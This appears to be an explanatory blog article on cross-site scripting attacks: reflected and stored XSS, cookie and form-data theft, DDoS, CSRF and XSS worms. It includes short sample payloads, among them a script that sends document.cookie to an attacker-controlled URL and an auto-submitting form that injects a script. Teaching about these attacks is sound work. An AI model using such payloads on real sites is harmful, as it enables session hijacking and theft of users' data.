
What XSS is and how to protect against it has long been known, so I will be brief. XSS is the ability of an attacker, by some means (see the link to the possible options at the end of the article), to inject a script into a page of the victim site that is executed whenever the page is visited.
Interestingly, in most places where this vulnerability is described, we are frightened with the following code:
http://www.site.com/page.php?var=<script>alert('xss');</script>
It does not look very scary :) So how can this vulnerability actually be dangerous?
Passive and active
There are two types of XSS vulnerabilities: passive and active (today more often called reflected and stored).
An active vulnerability is more dangerous, since the attacker does not need to lure the victim through a special link; it is enough to inject the code into the database or into some file on the server. Thus every visitor to the site automatically becomes a victim. The code can be injected, for example, via SQL injection. Therefore you should not trust data read from the database, even if it was sanitized when it was inserted.
An example of a passive vulnerability can be seen at the very beginning of the article. Here social engineering is already required, for example an "important" letter from the site administration asking you to check your account settings after a restore from backup. Accordingly, you need to know the victim's address, or simply arrange a spam mailing or a post on some forum, and it is by no means certain that the victims will be naive enough to follow your link.
Moreover, both POST and GET parameters can be subject to a passive vulnerability. With POST parameters, of course, some tricks are required, for example an auto-submitted form hosted on the attacker's site:
<form method="post" action="http://site.com/page.php">
<input type="hidden" name="var" value="<script>alert('xss')</script>">
</form>
<script type="text/javascript">
document.getElementsByTagName('form')[0].submit();
</script>
Therefore a GET vulnerability is a bit more dangerous, because it is easier for the victim to notice a wrong domain than an extra parameter (and the URL can also be encoded to disguise it).
Cookie theft
This is the most frequently cited example of an XSS attack. Cookies sometimes store valuable information (sometimes even the user's login and password, or its hash), but the most dangerous case is theft of an active session, so do not forget to click the "Logout" link on websites, even on a home computer. Fortunately, on most resources the lifetime of a session is limited.
var img = new Image();
img.src = 'http://site/xss.php?' + document.cookie;
This is why XMLHttpRequest was restricted to the page's own domain, but that does not stop an attacker, because <iframe>, <img>, <script>, background: url() and so on are still available.
Data theft from forms
The injected script finds a form, for example via getElementById, and hooks its onsubmit event. Now, before the form is submitted, the entered data is also sent to the attacker's server.
This type of attack resembles phishing, except that the real site is used rather than a fake one, which earns the victim's greater trust.
DDoS attack (distributed denial of service attack)
An XSS vulnerability on a heavily visited resource can be used to conduct a DDoS attack. The idea is simple: a flood of requests that the attacked server cannot withstand.
Actually, the relation to XSS is indirect, since scripts may not be needed at all; a construction of the following form is sufficient:
<img src="http://site.com/">
Cross-site request forgery (CSRF / XSRF)
This too is only indirectly related to XSS. It is a separate type of vulnerability, but it is often used together with XSS. The essence is that a user who is logged in on a site that is not itself vulnerable visits a vulnerable page (or a page specially prepared by the attacker), from which a request is sent to the first site to perform certain actions.
Roughly speaking, the ideal case for the attacker looks like this: the user is logged in to a payment system, then visits the attacker's website or a website with an XSS vulnerability, from which a request is sent to transfer money to the attacker's account.
This is why, for certain user actions (for example, changing the e-mail address), most websites ask for the password again or for a confirmation code.
XSS Worms
This type of attack appeared, probably, thanks to social networks such as VKontakte and Twitter. The idea is that a link exploiting an XSS vulnerability is sent to several users of the social network; when they click on it, the injected script sends messages to other users on their behalf, and so on. At the same time other actions may be performed, for example sending the victims' personal data to the attacker.
Harmless XSS
Interestingly, visitor counters are in essence also a kind of active XSS: data about the visitor, such as the IP address and screen resolution, is transmitted to a third-party server. The only difference is that you embed the code in your page of your own free will :) Take a look, for example, at the Google Analytics code.
Cross-domain AJAX requests can also be regarded as harmless XSS.
Related Links
- XSS Cheat Sheet - many ways to inject scripts, plus a bonus (text encodings and obfuscation of IP addresses).
- Description of XSS on Wikipedia
- DoS attack on VKontakte, "Runet Awards"
- Peace XSS - variants of cross-domain AJAX requests.
- Cross-Site Request Forgery - much ado about nothing
- XSS for newbies
- XSS Advanced Cross-Site Scripting
- Cookie tampering
- XSS worm: who is smaller? - a competition for the smallest JavaScript code that copies itself onward.
UPD: I advise you to read the comments, there are a lot of useful additions.
* Illustration taken from the presentation "PHP under Attack".